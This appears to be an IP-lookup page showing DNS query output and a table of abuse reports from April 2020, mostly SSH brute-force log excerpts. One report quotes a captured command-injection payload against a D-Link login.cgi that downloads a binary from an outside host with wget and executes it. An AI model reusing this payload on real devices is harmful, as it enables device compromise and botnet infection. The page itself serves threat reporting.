城市(city): unknown
省份(region): unknown
国家(country): China
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 14.21.151.49
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 28767
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;14.21.151.49. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025012802 1800 900 604800 86400
;; Query time: 13 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Jan 29 09:20:32 CST 2025
;; MSG SIZE rcvd: 105
Host 49.151.21.14.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 49.151.21.14.in-addr.arpa: NXDOMAIN
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 106.12.5.190 | attackbots | SSH/22 MH Probe, BF, Hack - |
2020-04-19 02:12:18 |
| 120.132.13.151 | attackbots | (sshd) Failed SSH login from 120.132.13.151 (CN/China/chunhui.net.cn): 5 in the last 3600 secs |
2020-04-19 02:06:21 |
| 93.115.96.162 | attackspambots | (sshd) Failed SSH login from 93.115.96.162 (FR/France/mail.raymail.fr): 2 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Apr 18 14:37:12 ubnt-55d23 sshd[6683]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=93.115.96.162 user=root Apr 18 14:37:15 ubnt-55d23 sshd[6683]: Failed password for root from 93.115.96.162 port 50320 ssh2 |
2020-04-19 02:12:54 |
| 37.139.1.197 | attackspam | Apr 18 16:30:59 l03 sshd[14800]: Invalid user um from 37.139.1.197 port 48509 ... |
2020-04-19 01:51:25 |
| 95.85.9.94 | attack | Apr 18 16:18:04 tuxlinux sshd[35212]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=95.85.9.94 user=root Apr 18 16:18:05 tuxlinux sshd[35212]: Failed password for root from 95.85.9.94 port 37833 ssh2 Apr 18 16:18:04 tuxlinux sshd[35212]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=95.85.9.94 user=root Apr 18 16:18:05 tuxlinux sshd[35212]: Failed password for root from 95.85.9.94 port 37833 ssh2 ... |
2020-04-19 02:12:35 |
| 62.234.124.104 | attack | "Unauthorized connection attempt on SSHD detected" |
2020-04-19 02:15:20 |
| 80.211.117.207 | attack | /login.cgi?cli=aa aa';wget http://157.230.29.251/bins/Solar.mips -O -> /tmp/.Solar;chmod 777 /tmp/.Solar;/tmp/.Solar dlink'$ |
2020-04-19 02:01:31 |
| 49.235.183.37 | attackspambots | Apr 18 13:46:58 Tower sshd[19783]: Connection from 49.235.183.37 port 32998 on 192.168.10.220 port 22 rdomain "" Apr 18 13:46:59 Tower sshd[19783]: Invalid user admin from 49.235.183.37 port 32998 Apr 18 13:46:59 Tower sshd[19783]: error: Could not get shadow information for NOUSER Apr 18 13:46:59 Tower sshd[19783]: Failed password for invalid user admin from 49.235.183.37 port 32998 ssh2 Apr 18 13:46:59 Tower sshd[19783]: Received disconnect from 49.235.183.37 port 32998:11: Bye Bye [preauth] Apr 18 13:46:59 Tower sshd[19783]: Disconnected from invalid user admin 49.235.183.37 port 32998 [preauth] |
2020-04-19 01:48:21 |
| 89.216.81.153 | attack | Apr 18 17:57:36 ns382633 sshd\[19055\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.216.81.153 user=root Apr 18 17:57:38 ns382633 sshd\[19055\]: Failed password for root from 89.216.81.153 port 38370 ssh2 Apr 18 18:00:21 ns382633 sshd\[19772\]: Invalid user ig from 89.216.81.153 port 51738 Apr 18 18:00:21 ns382633 sshd\[19772\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.216.81.153 Apr 18 18:00:23 ns382633 sshd\[19772\]: Failed password for invalid user ig from 89.216.81.153 port 51738 ssh2 |
2020-04-19 02:13:27 |
| 221.2.35.78 | attack | Invalid user hh from 221.2.35.78 port 12047 |
2020-04-19 01:53:37 |
| 118.89.229.117 | attackspam | 2020-04-18T13:28:06.497189homeassistant sshd[18829]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.89.229.117 user=root 2020-04-18T13:28:08.331184homeassistant sshd[18829]: Failed password for root from 118.89.229.117 port 54733 ssh2 ... |
2020-04-19 02:06:47 |
| 121.162.131.223 | attackspambots | Bruteforce detected by fail2ban |
2020-04-19 02:05:50 |
| 54.37.71.235 | attackspam | 2020-04-18T11:49:25.755742linuxbox-skyline sshd[232706]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.71.235 user=root 2020-04-18T11:49:28.042871linuxbox-skyline sshd[232706]: Failed password for root from 54.37.71.235 port 55832 ssh2 ... |
2020-04-19 02:16:13 |
| 144.217.7.75 | attackbots | Apr 18 19:49:00 vserver sshd\[32268\]: Invalid user test from 144.217.7.75Apr 18 19:49:02 vserver sshd\[32268\]: Failed password for invalid user test from 144.217.7.75 port 48162 ssh2Apr 18 19:54:25 vserver sshd\[32377\]: Invalid user rx from 144.217.7.75Apr 18 19:54:27 vserver sshd\[32377\]: Failed password for invalid user rx from 144.217.7.75 port 40336 ssh2 ... |
2020-04-19 02:03:26 |
| 119.139.199.169 | attack | Lines containing failures of 119.139.199.169 Apr 17 11:09:22 icinga sshd[18483]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.139.199.169 user=r.r Apr 17 11:09:24 icinga sshd[18483]: Failed password for r.r from 119.139.199.169 port 57084 ssh2 Apr 17 11:09:24 icinga sshd[18483]: Received disconnect from 119.139.199.169 port 57084:11: Bye Bye [preauth] Apr 17 11:09:24 icinga sshd[18483]: Disconnected from authenticating user r.r 119.139.199.169 port 57084 [preauth] Apr 17 11:21:07 icinga sshd[21716]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.139.199.169 user=r.r Apr 17 11:21:09 icinga sshd[21716]: Failed password for r.r from 119.139.199.169 port 43960 ssh2 Apr 17 11:21:10 icinga sshd[21716]: Received disconnect from 119.139.199.169 port 43960:11: Bye Bye [preauth] Apr 17 11:21:10 icinga sshd[21716]: Disconnected from authenticating user r.r 119.139.199.169 port 43960 [preau........ ------------------------------ |
2020-04-19 01:39:46 |